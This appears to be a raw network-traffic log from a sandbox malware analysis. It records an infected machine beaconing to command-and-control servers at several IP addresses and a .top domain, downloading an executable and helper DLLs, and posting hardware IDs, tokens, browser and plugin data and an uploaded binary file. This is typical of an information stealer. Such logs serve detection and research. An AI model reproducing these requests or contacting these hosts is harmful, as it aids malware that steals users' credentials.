                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019811001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 36 42 37 45 33 44 43 45 34 45 37 35 38 38 30 39 30 31 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="hwid"E36B7E3DCE4E758809014------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build"stok------EBKKKEGIDBGHIDGDHDBF--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="message"browsers------ECBKKKFHCFIDHIECGCAF--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAAHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 49 44 48 44 41 4b 4a 45 43 42 46 48 43 42 41 41 2d 2d 0d 0a Data Ascii: ------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------DHCGIDHDAKJECBFHCBAAContent-Disposition: form-data; name="message"plugins------DHCGIDHDAKJECBFHCBAA--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------KFIEHIIIJDAAAAAAKECBContent-Disposition: form-data; name="message"fplugins------KFIEHIIIJDAAAAAAKECB--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019812001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: 185.215.113.206Content-Length: 8275Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: */*Content-Length: 27550Content-Type: multipart/form-data; boundary=------------------------LD6ZS6L8rUHFQ5ehyM7ZrTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 44 36 5a 53 36 4c 38 72 55 48 46 51 35 65 68 79 4d 37 5a 72 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 6f 6a 69 63 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0f db fc 92 00 a4 b4 b4 17 2d 84 27 24 e9 64 cc c5 55 b2 88 bd 02 13 a9 01 7e 49 8e a5 e7 65 2b 5d ac 6f 05 0d 41 f6 2a c6 9e 47 6c da ec 9b 40 83 ac 49 6f 82 1c 97 7e 92 b7 7c 37 d6 57 19 84 60 22 33 9d 97 87 a5 9f 18 e7 28 6e f6 ca 74 54 80 12 63 80 92 21 40 f2 0f 52 20 3f a0 bb 63 ec 28 a0 b2 6e 89 d5 55 eb b5 ba 8c 91 a2 c6 66 d0 29 4e bf 40 5d 22 19 66 c0 17 87 8a 62 de 7b 3f a6 e5 74 82 c0 c9 49 84 b6 ba 20 85 dc cd ea 54 c6 98 e0 fc 39 1c 16 d2 ea 15 e1 3e 1f 16 a0 ed a6 1c 3b 14 be ff 09 05 75 76 5f 21 2c 5e ca 63 35 1e d8 50 d8 d5 c4 02 ea 38 bc 26 1c 43 60 41 59 1f 2c b2 0d 26 1d 4d e2 90 07 2d 90 a1 c2 0b e2 ec 89 1d 09 59 08 a6 4b c3 18 17 a4 a8 cd 25 49 ce 0d dc 77 19 6d 40 33 6e 52 6c 58 a3 6c a5 11 e5 a0 2c c5 32 4d 4e da 72 21 aa 88 cb a7 49 3e d2 e6 14 d3 4a 6f 10 4e 8b 92 1d 81 ff fc 0b 9d ab 2e 31 a3 1e 0c 94 3f 25 21 22 7c 2b 05 49 f9 fb 98 37 9f b6 ca fc 12 60 ce f6 b9 3f 1f 82 57 7b 8f 2d 93 0f f2 10 91 6f 56 d2 fc 48 c6 e8 51 59 c2 b4 65 67 eb d8 7d a8 ad f8 0b bd ef 2a 44 2a ed 40 d3 a7 a4 da 4c 61 4d 47 23 f3 db 2c 91 87 db 84 9b a1 72 7b 04 6a 00 0e ba 75 c8 ae 2b 53 85 ee a3 c7 13 7e 1d 96 ed 99 b2 1e 50 12 e9 51 51 d2 be e2 4b 69 96 1c d1 95 83 f6 40 d5 ff 5c f0 c7 b9 ff 19 ca 75 e9 66 93 92 4a 28 d8 6e 84 bf 30 8e 63 c5 06 9f 25 e1 fe 1a 91 7a 36 96 17 f4 65 ea 5c 6e 48 aa 84 3e b9 e3 4b 43 9f d3 92 e0 37 0d ac fc 82 47 33 00 db a8 40 de 62 b3 bb 77 e1 13 ab 90 ac f4 d3 0d e3 29 39 2f 46 2d d6 db c9 9d c6 6b 67 6b ec e9 d2 60 7d 45 e8 3d 69 61 85 c0 b0 b8 bb 6e 42 05 6d 77 36 c5 22 45 e7 71 04 c1 e3 c2 14 b3 63 a7 61 f2 52 87 ad e0 8b 88 ab 3d 1b 2b e9 87 24 b1 04 f3 db e9 13 49 bb a2 1c cf 26 72 c0 07 66 0a 93 b3 92 dd 78 3a 20 6c dd e0 6c 01 56 70 51 a6 37 16 2d f1 f3 e6 e2 c6 df ee 73 14 ca 7d ad 93 2d 6c 79 dd a0 c0 e9 9b f9 42 83 50 85 40 21 4e 38 69 e2 41 6b 18 82 02 eb 3f 2c ce f1 c7 78 d7 7d 71 65 f7 da ef a3 d0 a6 7f 53 95 23 f3 37 c6 3d 94 94 cf 0a 52 4f 02 9c 3c 1e d8 eb 8f 5f 33 bd 6b 79 d9 d8 b6 69 ba 8c ea 2a fb 81 05 86 5c 7d e0 6d 88 04 b4 79 b7 59 39 bb 2b 04 5c a1 57 16 0e 57 d7 16 eb 67 86 39 62 e9 08 dc 9f c1 a5 78 b6 5a d5 ee e8 64 63 f1 c0 26 cb 80 6d 31 a1 3b d7 40 c2 cf 21 23 dd 9e 26 51 6c b6 a4 55 18 31 ab 0f c5 af 07 d1 db 89 32 cc ed f7 ab 40 5a 72 12 18 92 5c 12 fd 13 c7 26 9c 41 a9 f9 84 75 83 1e 28 5f db fb a8 68 52 03 d6 09 a9 99
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file"------JJDBAEHIJKJKEBFIEGHI--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 2d 2d 0d 0a Data Ascii: ------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file"------AAEHDAAKEHJECBFHCBKF--
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
